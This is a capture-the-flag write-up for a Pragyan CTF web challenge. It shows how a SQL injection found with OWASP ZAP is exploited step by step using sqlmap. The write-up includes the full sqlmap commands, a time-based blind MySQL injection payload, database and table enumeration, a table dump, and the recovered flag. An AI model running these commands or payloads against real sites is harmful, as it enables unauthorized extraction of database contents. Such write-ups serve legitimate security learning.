Tags: sqlinjection sqlmap web 

Rating: 0

The website at http://ctf.pragyan.org:14000/index.php allow to register a user and login, but shows no informations and does not allow one to do any actions.

Running an *Active Scan* with *OWASP ZAP* shows a possible SQL injection vulnerability in the profile page:

![](https://i.imgur.com/9NtMbZy.png)

Running a basic assessement with SQLMap verifies that:

```bash
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=fooman" --cookie "PHPSESSID=c06fe05e8915a69cf66610e350dcfcb4"

...
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
...
[15:34:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:34:39] [INFO] GET parameter 'NAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[15:35:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:35:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:35:08] [INFO] checking if the injection point on GET parameter 'NAME' is a false positive
GET parameter 'NAME' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 131 HTTP(s) requests:
---
Parameter: NAME (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: success=welcome&NAME=fooman' AND (SELECT 7978 FROM (SELECT(SLEEP(5)))Kokv) AND 'llyd'='llyd
---
[15:35:58] [INFO] the back-end DBMS is MySQL
[15:35:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12
[15:35:59] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ctf.pragyan.org'

[*] ending @ 15:35:59 /2020-02-23/
```

We can extend on this, to retrieve the database's structure:

```bash
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=fooman" --cookie "PHPSESSID=c06fe05e8915a69cf66610e350dcfcb4" --dbms=MySQL --tables -p NAME

...
[15:38:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: NAME (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: success=welcome&NAME=fooman' AND (SELECT 7978 FROM (SELECT(SLEEP(5)))Kokv) AND 'llyd'='llyd
---
[15:38:01] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[15:38:18] [INFO] confirming MySQL
[15:38:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[15:38:29] [INFO] adjusting time delay to 2 seconds due to good response times
[15:38:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[15:38:29] [INFO] fetching database names
[15:38:29] [INFO] fetching number of databases
[15:38:29] [INFO] retrieved: 2
[15:38:35] [INFO] retrieved: information_schema
[15:40:57] [INFO] retrieved: capture_the_flag
[15:43:16] [INFO] fetching tables for databases: 'capture_the_flag, information_schema'
[15:43:16] [INFO] fetching number of tables for database 'information_schema'
[15:43:16] [INFO] retrieved: 73
[15:43:29] [INFO] retrieved: ADMIN^C
```

Get the tables in the `capture_the_flag` schema:

```bash
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=fooman" --cookie "PHPSESSID=c06fe05e8915a69cf66610e350dcfcb4" -p NAME --dbms=MySQL -D capture_the_flag --tables

...
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[15:46:33] [INFO] adjusting time delay to 1 second due to good response times
3
[15:46:34] [INFO] retrieved: pandoralocations
[15:47:49] [INFO] retrieved: pandoramsg
[15:48:11] [INFO] retrieved: pandorausers
Database: capture_the_flag
[3 tables]
+------------------+
| pandoralocations |
| pandoramsg |
| pandorausers |
+------------------+

```

The challenge description indicates, that we need to find a location. Let's dump that table:

```bash
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=fooman" --cookie "PHPSESSID=c06fe05e8915a69cf66610e350dcfcb4" -p NAME --dbms=MySQL -D capture_the_flag -T pandoralocations --dump
...
[16:22:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: NAME (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: success=welcome&NAME=fooman' AND (SELECT 7978 FROM (SELECT(SLEEP(5)))Kokv) AND 'llyd'='llyd
---
[16:22:25] [INFO] testing MySQL
[16:22:25] [INFO] confirming MySQL
[16:22:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[16:22:25] [INFO] fetching columns for table 'pandoralocations' in database 'capture_the_flag'
[16:22:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[16:22:32] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[16:23:05] [INFO] adjusting time delay to 2 seconds due to good response times
3
[16:23:06] [INFO] retrieved: base
[16:23:31] [INFO] retrieved: latitude
[16:24:31] [INFO] retrieved: longitude
[16:25:46] [INFO] fetching entries for table 'pandoralocations' in database 'capture_the_flag'
[16:25:46] [INFO] fetching number of entries for table 'pandoralocations' in database 'capture_the_flag'
[16:25:46] [INFO] retrieved: 3
[16:25:54] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[16:26:08] [INFO] adjusting time delay to 1 second due to good response times
base1
[16:26:21] [INFO] retrieved: 10.0054 N
[16:27:09] [INFO] retrieved: 45.0245E
[16:27:52] [INFO] retrieved: base2
[16:28:11] [INFO] retrieved: p_ctf{4vengers_455emb1e_0ne_l45t_t1me}
[16:31:37] [INFO] retrieved: 56
...
```

Flag: **p_ctf{4vengers_455emb1e_0ne_l45t_t1me}**